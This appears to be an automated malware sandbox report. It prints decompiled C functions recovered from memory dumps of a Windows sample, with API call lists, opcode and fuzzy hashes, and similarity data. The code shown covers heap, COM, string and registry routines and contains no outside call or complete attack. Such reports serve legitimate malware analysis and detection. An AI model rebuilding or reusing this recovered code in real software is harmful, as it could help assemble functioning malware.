                              • Opcode ID: 6db49e5b0b54f245b09f1917521e13d0ee29238c48b4a6de05c5c7d9a0e9af92
                              • Instruction ID: 8ef339c6603be93cf56754ea004a7f529bb61b6cfde0096c6391974bcfc9d793
                              • Opcode Fuzzy Hash: 6db49e5b0b54f245b09f1917521e13d0ee29238c48b4a6de05c5c7d9a0e9af92
                              • Instruction Fuzzy Hash: F3E04CF4B503059BAB709F75FAD8A5F3BECAB1478130414A4B986D314CDA3ED604CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E60DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				int _v12;
                              				signed int _v16;
                              				void* _v20;
                              				signed char _v36;
                              				void* _t24;
                              				intOrPtr _t27;
                              				signed int _t38;
                              				signed char* _t46;
                              				int _t53;
                              				void* _t55;
                              				void* _t56;
                              				void* _t57;
                              
                              				_v16 = _v16 & 0x00000000;
                              				_t46 = _a4;
                              				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                              				_v12 = 0x110;
                              				_t24 = E013E55DC(_t53);
                              				_a4 = _t24;
                              				if(_t24 != 0) {
                              					memcpy(_t24,  *0x13ed308, 0x110);
                              					_t27 =  *0x13ed30c; // 0x0
                              					_t57 = _t56 + 0xc;
                              					if(_t27 != 0) {
                              						_t51 = _a4;
                              						E013E6E0F(0x110, _a4, _t27, 0);
                              					}
                              					if(E013E8DD3( &_v36) != 0 && E013E6E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
                              						_t55 = _v20;
                              						_v36 =  *_t46;
                              						_t38 = E013E2363(_t55, _a8, _t51, _t46, _a12); // executed
                              						_v16 = _t38;
                              						 *(_t55 + 4) = _v36;
                              						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                              						_t57 = _t57 + 0xc;
                              						E013E6DFA(_t55);
                              					}
                              					memset(_a4, 0, _t53);
                              					E013E6DFA(_a4);
                              				}
                              				return _v16;
                              			}

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 013E6113
                              • memset.NTDLL ref: 013E6188
                              • memset.NTDLL ref: 013E619C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 1529149438-0
                              • Opcode ID: 59b24d23793cc3436a4c0cf266b1982b2c7a082b6ce5d41bd1239f065200f7ce
                              • Instruction ID: 5ef3b1ac8d6a8e4546a9b99dbb83b16de9e97fdf7eb40b1a3be9549421da4a5f
                              • Opcode Fuzzy Hash: 59b24d23793cc3436a4c0cf266b1982b2c7a082b6ce5d41bd1239f065200f7ce
                              • Instruction Fuzzy Hash: 7B212FB5A00329ABDB11AF59CC45BDFBBF8AF68644F044025F905E6281E734D650CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E013E447C(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                              				char _v8;
                              				void* _t14;
                              				intOrPtr _t17;
                              				void* _t20;
                              				void* _t26;
                              
                              				_push(__ecx);
                              				if(_a4 == 0 || __eax == 0) {
                              					_t26 = 0x57;
                              				} else {
                              					_t14 = E013E78A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                              					_t26 = _t14;
                              					if(_t26 == 0) {
                              						_t17 =  *0x13ed2b8; // 0x26ea5a8
                              						_t9 = _t17 + 0x13eea1c; // 0x444f4340
                              						_t20 = E013E456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                              						_t26 = _t20;
                              						RtlFreeHeap( *0x13ed270, 0, _a4); // executed
                              					}
                              				}
                              				return _t26;
                              			}

                              0x013e447f
                              0x013e4485
                              0x013e44dc
                              0x013e448b
                              0x013e4496
                              0x013e449b
                              0x013e449f
                              0x013e44ac
                              0x013e44b4
                              0x013e44c0
                              0x013e44c8
                              0x013e44d2
                              0x013e44d2
                              0x013e449f
                              0x013e44e1

                              APIs
                                • Part of subcall function 013E78A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 013E78C0
                                • Part of subcall function 013E456E: lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 013E45A2
                                • Part of subcall function 013E456E: StrStrA.SHLWAPI(00000000,?), ref: 013E45AF
                                • Part of subcall function 013E456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 013E45CE
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,013E2EB0), ref: 013E44D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Allocate$Freelstrlen
                              • String ID: Uxt
                              • API String ID: 2220322926-1536154274
                              • Opcode ID: 3e037e3fa719b851732c68e314e493f970281b2bbaf37d98a42b77fb4a0adaad
                              • Instruction ID: c899decd2081fd5963157b53b043a1f5a324944bbfa9a625c77e1374e1da4699
                              • Opcode Fuzzy Hash: 3e037e3fa719b851732c68e314e493f970281b2bbaf37d98a42b77fb4a0adaad
                              • Instruction Fuzzy Hash: E7014B76200218FBDB22CF48DC04E9A7BE9EB58354F118025FA05AA5A0E731EA54DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E6DFA(void* _a4) {
                              				char _t2;
                              
                              				_t2 = RtlFreeHeap( *0x13ed270, 0, _a4); // executed
                              				return _t2;
                              			}

                              0x013e6e06
                              0x013e6e0c

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 3d27eba6521cf9335affa87d872dc72d40b8e47c74bbd590179a070ceb060429
                              • Instruction ID: 075f76f14dd4266f0b2cbd0db799e82690634079a4b7902d72c3ef007c8544dd
                              • Opcode Fuzzy Hash: 3d27eba6521cf9335affa87d872dc72d40b8e47c74bbd590179a070ceb060429
                              • Instruction Fuzzy Hash: 30B01271000300EBCE314B50DE09F097FB5B750700F019411F2000C0E8C2318820EB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 38%
                              			E013E4176(intOrPtr _a4) {
                              				void* _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				void* _v28;
                              				char _v32;
                              				intOrPtr _v40;
                              				void* _v46;
                              				short _v48;
                              				intOrPtr _t49;
                              				void* _t51;
                              				intOrPtr* _t53;
                              				intOrPtr _t56;
                              				void* _t58;
                              				intOrPtr* _t59;
                              				intOrPtr* _t61;
                              				intOrPtr* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr* _t73;
                              				intOrPtr _t76;
                              				intOrPtr* _t79;
                              				short _t81;
                              				char* _t97;
                              				intOrPtr _t99;
                              				void* _t105;
                              				void* _t107;
                              				intOrPtr _t111;
                              
                              				_t81 = 0;
                              				_v48 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosw");
                              				_t49 =  *0x13ed2b8; // 0x26ea5a8
                              				_t4 = _t49 + 0x13ee44c; // 0x3ad89f4
                              				_t5 = _t49 + 0x13ee43c; // 0x9ba05972
                              				_t51 =  *0x13ed124(_t5, 0, 4, _t4,  &_v20); // executed
                              				_t105 = _t51;
                              				if(_t105 >= 0) {
                              					_t53 = _v20;
                              					_push( &_v12);
                              					_push(1);
                              					_push( &_v32);
                              					_push(8);
                              					_t97 =  &_v48;
                              					_push(_t97);
                              					_push(_t97);
                              					_push(_t53); // executed
                              					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                              						_t56 =  *0x13ed2b8; // 0x26ea5a8
                              						_t30 = _t56 + 0x13ee42c; // 0x3ad89d4
                              						_t31 = _t56 + 0x13ee45c; // 0x4c96be40
                              						_t58 =  *0x13ed0f0(_v12, _t31, _t30,  &_v24); // executed
                              						_t105 = _t58;
                              						_t59 = _v12;
                              						 *((intOrPtr*)( *_t59 + 8))(_t59);
                              						goto L11;
                              					} else {
                              						_t71 = _v20;
                              						_v16 = 0;
                              						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                              						if(_t105 >= 0) {
                              							_t111 = _v16;
                              							if(_t111 == 0) {
                              								_t105 = 0x80004005;
                              								goto L11;
                              							} else {
                              								if(_t111 <= 0) {
                              									L11:
                              									if(_t105 >= 0) {
                              										goto L12;
                              									}
                              								} else {
                              									do {
                              										_t73 = _v20;
                              										_v48 = 3;
                              										_v40 = _t81;
                              										_t107 = _t107 - 0x10;
                              										asm("movsd");
                              										asm("movsd");
                              										asm("movsd");
                              										asm("movsd");
                              										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                              										if(_t105 < 0) {
                              											goto L7;
                              										} else {
                              											_t76 =  *0x13ed2b8; // 0x26ea5a8
                              											_t23 = _t76 + 0x13ee42c; // 0x3ad89d4
                              											_t24 = _t76 + 0x13ee45c; // 0x4c96be40
                              											_t105 =  *0x13ed0f0(_v12, _t24, _t23,  &_v24);
                              											_t79 = _v12;
                              											 *((intOrPtr*)( *_t79 + 8))(_t79);
                              											if(_t105 >= 0) {
                              												L12:
                              												_t63 = _v24;
                              												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                              												if(_t105 >= 0) {
                              													_t99 =  *0x13ed2b8; // 0x26ea5a8
                              													_t67 = _v28;
                              													_t40 = _t99 + 0x13ee41c; // 0x214e3
                              													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                              													_t69 = _v28;
                              													 *((intOrPtr*)( *_t69 + 8))(_t69);
                              												}
                              												_t65 = _v24;
                              												 *((intOrPtr*)( *_t65 + 8))(_t65);
                              											} else {
                              												goto L7;
                              											}
                              										}
                              										goto L15;
                              										L7:
                              										_t81 = _t81 + 1;
                              									} while (_t81 < _v16);
                              									goto L11;
                              								}
                              							}
                              						}
                              					}
                              					L15:
                              					_t61 = _v20;
                              					 *((intOrPtr*)( *_t61 + 8))(_t61);
                              				}
                              				return _t105;
                              			}

                              0x013e4181
                              0x013e4183
                              0x013e418a
                              0x013e418b
                              0x013e418c
                              0x013e418d
                              0x013e4193
                              0x013e4198
                              0x013e41a2
                              0x013e41a9
                              0x013e41af
                              0x013e41b3
                              0x013e41b9
                              0x013e41c1
                              0x013e41c2
                              0x013e41c7
                              0x013e41c8
                              0x013e41ca
                              0x013e41cd
                              0x013e41ce
                              0x013e41cf
                              0x013e41d5
                              0x013e426a
                              0x013e426f
                              0x013e4276
                              0x013e4280
                              0x013e4286
                              0x013e4288
                              0x013e428e
                              0x00000000
                              0x013e41db
                              0x013e41db
                              0x013e41e2
                              0x013e41eb
                              0x013e41ef
                              0x013e41f5
                              0x013e41f8
                              0x013e425f
                              0x00000000
                              0x013e41fa
                              0x013e41fa
                              0x013e4291
                              0x013e4293
                              0x00000000
                              0x00000000
                              0x013e4200
                              0x013e4200
                              0x013e4200
                              0x013e4207
                              0x013e420d
                              0x013e4212
                              0x013e421a
                              0x013e421b
                              0x013e421c
                              0x013e421e
                              0x013e4222
                              0x013e4226
                              0x00000000
                              0x013e4228
                              0x013e422c
                              0x013e4231
                              0x013e4238
                              0x013e4248
                              0x013e424a
                              0x013e4250
                              0x013e4255
                              0x013e4295
                              0x013e4295
                              0x013e42a2
                              0x013e42a6
                              0x013e42ab
                              0x013e42b1
                              0x013e42b6
                              0x013e42c0
                              0x013e42c2
                              0x013e42c8
                              0x013e42c8
                              0x013e42cb
                              0x013e42d1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e4255
                              0x00000000
                              0x013e4257
                              0x013e4257
                              0x013e4258
                              0x00000000
                              0x013e425d
                              0x013e41fa
                              0x013e41f8
                              0x013e41ef
                              0x013e42d4
                              0x013e42d4
                              0x013e42da
                              0x013e42da
                              0x013e42e3

                              APIs
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,?,?,?,?,013E6FE2), ref: 013E4242
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,013E6FE2,00000000,00000000,00000000,006D0063), ref: 013E4280
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: QueryServiceUnknown_
                              • String ID:
                              • API String ID: 2042360610-0
                              • Opcode ID: 9b1eb09379efbbe125905c5b84215dab7e304c6c60cfd62c878b13772c3cc27b
                              • Instruction ID: 87103a19e462fc6fd8f31cf1a55494ef63a2fc739b5f60db45a429b56e51ca9b
                              • Opcode Fuzzy Hash: 9b1eb09379efbbe125905c5b84215dab7e304c6c60cfd62c878b13772c3cc27b
                              • Instruction Fuzzy Hash: 96512F75900219AFDB10CFE8C898DAEB7F9FF8C714B048558EA15EB290D731A945CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E013E5A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                              				void* _v8;
                              				void* __esi;
                              				intOrPtr* _t35;
                              				void* _t40;
                              				intOrPtr* _t41;
                              				intOrPtr* _t43;
                              				intOrPtr* _t45;
                              				intOrPtr* _t50;
                              				intOrPtr* _t52;
                              				void* _t54;
                              				intOrPtr* _t55;
                              				intOrPtr* _t57;
                              				intOrPtr* _t61;
                              				intOrPtr* _t65;
                              				intOrPtr _t68;
                              				void* _t72;
                              				void* _t75;
                              				void* _t76;
                              
                              				_t55 = _a4;
                              				_t35 =  *((intOrPtr*)(_t55 + 4));
                              				_a4 = 0;
                              				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                              				if(_t76 < 0) {
                              					L18:
                              					return _t76;
                              				}
                              				_t40 = E013E6A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                              				_t76 = _t40;
                              				if(_t76 >= 0) {
                              					_t61 = _a28;
                              					if(_t61 != 0 &&  *_t61 != 0) {
                              						_t52 = _v8;
                              						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                              					}
                              					if(_t76 >= 0) {
                              						_t43 =  *_t55;
                              						_t68 =  *0x13ed2b8; // 0x26ea5a8
                              						_t20 = _t68 + 0x13ee1fc; // 0x740053
                              						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                              						if(_t76 >= 0) {
                              							_t76 = E013E4B0E(_a4);
                              							if(_t76 >= 0) {
                              								_t65 = _a28;
                              								if(_t65 != 0 &&  *_t65 == 0) {
                              									_t50 = _a4;
                              									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                              								}
                              							}
                              						}
                              						_t45 = _a4;
                              						if(_t45 != 0) {
                              							 *((intOrPtr*)( *_t45 + 8))(_t45);
                              						}
                              						_t57 = __imp__#6;
                              						if(_a20 != 0) {
                              							 *_t57(_a20);
                              						}
                              						if(_a12 != 0) {
                              							 *_t57(_a12);
                              						}
                              					}
                              				}
                              				_t41 = _v8;
                              				 *((intOrPtr*)( *_t41 + 8))(_t41);
                              				goto L18;
                              			}

                              0x013e5a64
                              0x013e5a67
                              0x013e5a77
                              0x013e5a80
                              0x013e5a84
                              0x013e5b52
                              0x013e5b58
                              0x013e5b58
                              0x013e5a9e
                              0x013e5aa3
                              0x013e5aa7
                              0x013e5aad
                              0x013e5ab2
                              0x013e5ab9
                              0x013e5ac8
                              0x013e5ac8
                              0x013e5acc
                              0x013e5ace
                              0x013e5ada
                              0x013e5ae5
                              0x013e5af0
                              0x013e5af4
                              0x013e5afe
                              0x013e5b02
                              0x013e5b04
                              0x013e5b09
                              0x013e5b10
                              0x013e5b20
                              0x013e5b20
                              0x013e5b09
                              0x013e5b02
                              0x013e5b22
                              0x013e5b27
                              0x013e5b2c
                              0x013e5b2c
                              0x013e5b32
                              0x013e5b38
                              0x013e5b3d
                              0x013e5b3d
                              0x013e5b42
                              0x013e5b47
                              0x013e5b47
                              0x013e5b42
                              0x013e5acc
                              0x013e5b49
                              0x013e5b4f
                              0x00000000

                              APIs
                                • Part of subcall function 013E6A4D: SysAllocString.OLEAUT32(80000002), ref: 013E6AA4
                                • Part of subcall function 013E6A4D: SysFreeString.OLEAUT32(00000000), ref: 013E6B09
                              • SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SysFreeString.OLEAUT32(013E4993), ref: 013E5B47
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: f648fa95245fa9df9780e85bd386645097aea0826e7a28d99f7721ef5b062c73
                              • Instruction ID: 43b03e9a538097fa20e0f6c5cfbdb7c07701423890f5fbe765298cf7dd76b78c
                              • Opcode Fuzzy Hash: f648fa95245fa9df9780e85bd386645097aea0826e7a28d99f7721ef5b062c73
                              • Instruction Fuzzy Hash: 8531397A50022AEFCF21DF99D888C9BBBB9FFC97487144658F9059B250D231ED51CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                              • RegOpenKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364FD
                              • lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: 559ab40f3eea43cf6f337c596cc65a39104147c0659c30b615762fb398a6fda1
                              • Instruction ID: 89ab2fef07b568694d037bc398ddc4be35815beb5ce9468828a1c832fc995c4b
                              • Opcode Fuzzy Hash: 559ab40f3eea43cf6f337c596cc65a39104147c0659c30b615762fb398a6fda1
                              • Instruction Fuzzy Hash: A1214A76180205EFD751CFA4E896AD577F8FF42364F3881AEE841CA211D33AA946CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RegQueryValueExA.KERNELBASE(00000001,04B38560,00000000,?,0104F06C,00000000,00000001,00000001,04B38560,0104F072,00000000,?,?,?,04B38560,00000001), ref: 0103000B
                              • RegCloseKey.ADVAPI32(?), ref: 01030054
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCreateQueryValuelstrlen
                              • String ID:
                              • API String ID: 971780412-0
                              • Opcode ID: 8f22a72830c31df18fa2d0350c151d2b4d15ef76a0602f8addb5c1e65f6e5202
                              • Instruction ID: 0bbb6a689bb59d87e8cdadb36fd41dd89e29084b81e427dd2a9565f756354ab7
                              • Opcode Fuzzy Hash: 8f22a72830c31df18fa2d0350c151d2b4d15ef76a0602f8addb5c1e65f6e5202
                              • Instruction Fuzzy Hash: FB3141B5D0121AEFDB21DF99D9809AEBBFCFB84751F1081A6F584E2109C7755A40CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E013E5F72(intOrPtr* __eax, intOrPtr _a4) {
                              				void* _v8;
                              				void* _v12;
                              				void* _v16;
                              				intOrPtr _t2;
                              				intOrPtr _t6;
                              				intOrPtr _t12;
                              				intOrPtr* _t22;
                              				void* _t23;
                              				intOrPtr* _t24;
                              				intOrPtr* _t26;
                              				intOrPtr* _t28;
                              				intOrPtr* _t30;
                              				void* _t31;
                              				intOrPtr* _t32;
                              				intOrPtr _t42;
                              				intOrPtr _t45;
                              				intOrPtr _t48;
                              				void* _t51;

                              				// __eax is a COM interface pointer; the call through vtable offset 0x3c
                              				// returns a further interface in _v16 (HRESULT in _t51, success if >= 0).
                              				_push( &_v16);
                              				_t42 =  *0x13ed2b8; // 0x26ea5a8
                              				_t2 = _t42 + 0x13ee46c; // 0x20400
                              				_push(0);
                              				_push(__eax); // executed
                              				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                              				if(_t51 >= 0) {
                              					_t22 = _v16;
                              					_t45 =  *0x13ed2b8; // 0x26ea5a8
                              					_t6 = _t45 + 0x13ee48c; // 0xe7a1af80
                              					// vtable slot 0 is IUnknown::QueryInterface (see the APIs list below); _t6 points at the requested IID
                              					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                              					_t51 = _t23;
                              					if(_t51 >= 0) {
                              						_t26 = _v12;
                              						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                              						if(_t51 >= 0) {
                              							_t48 =  *0x13ed2b8; // 0x26ea5a8
                              							_t30 = _v8;
                              							_t12 = _t48 + 0x13ee47c; // 0xa4c6892c
                              							// second QueryInterface, this time storing the result through the caller-supplied _a4
                              							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                              							_t51 = _t31;
                              							_t32 = _v8;
                              							 *((intOrPtr*)( *_t32 + 8))(_t32); // vtable offset 8 is IUnknown::Release
                              						}
                              						_t28 = _v12;
                              						 *((intOrPtr*)( *_t28 + 8))(_t28); // Release
                              					}
                              					_t24 = _v16;
                              					 *((intOrPtr*)( *_t24 + 8))(_t24); // Release
                              				}
                              				return _t51;
                              			}

                              APIs
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 013E5FAF
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 013E5FE0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Interface_ProxyQueryUnknown_
                              • String ID:
                              • API String ID: 2522245112-0
                              • Opcode ID: 7813ba11c36c5661c218e59e67bcfe8aa518f0a2f61765d561ddeea5a8e45b1f
                              • Instruction ID: 7a0564e411da84dc41dd57dfac64f057377dcc3f15bb116172f72a84a69cfdc5
                              • Opcode Fuzzy Hash: 7813ba11c36c5661c218e59e67bcfe8aa518f0a2f61765d561ddeea5a8e45b1f
                              • Instruction Fuzzy Hash: 52215E7590071AEFCB10CFA8C448D5AB7B9EF88714B108694E905EF354D630ED05CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 0103CE2E
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0103CE75
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: f10a734af97f29c5ad8bfd3f6889c0c6e56978e10c3acb31b99be96c8d31a6b5
                              • Instruction ID: d9ca08b9ab6b6656f20764d889bfa917643cb0c6ef8b921f7f45b1d9845c3344
                              • Opcode Fuzzy Hash: f10a734af97f29c5ad8bfd3f6889c0c6e56978e10c3acb31b99be96c8d31a6b5
                              • Instruction Fuzzy Hash: 38118676900209BBE7119FACC984BDEBBFCEFD1754F10406AE594E7200DB758E048B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,00000000,69B25F44,00000000,01024FAB), ref: 01039478
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,01024FAB,?,00000000), ref: 010394D9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: 2b3cca8aec15b4d1f8439c639a2fedda9f70f746b5e30a6b52895e690ff26aeb
                              • Instruction ID: 5b10baf37025f4e278e4d68c1b9ea5eb3ee5ce402eaf308475a6a6b9603f2c52
                              • Opcode Fuzzy Hash: 2b3cca8aec15b4d1f8439c639a2fedda9f70f746b5e30a6b52895e690ff26aeb
                              • Instruction Fuzzy Hash: D811F8B5D0030AEFDB61EBA4D948ADFB7BCAB48305F1040A2F981E2149DB799B44CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 013E24C2
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SafeArrayDestroy.OLEAUT32(?), ref: 013E250F
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ArraySafe$CreateDestroyFreeString
                              • String ID:
                              • API String ID: 3098518882-0
                              • Opcode ID: c2a670cd7a4df35567e2e4a30e3046467ba40990771a5073c01fc3263f6cc46e
                              • Instruction ID: 1489944721720c577e8380b9eb1f78824b5f074ff008573f27789508d4f32950
                              • Opcode Fuzzy Hash: c2a670cd7a4df35567e2e4a30e3046467ba40990771a5073c01fc3263f6cc46e
                              • Instruction Fuzzy Hash: 6F113072900619BFDB11DF98CC48EEEBBF9AB18314F008025FA05A61A0D770DA55CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(013EA6E1), ref: 013E2645
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SysFreeString.OLEAUT32(00000000), ref: 013E2685
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
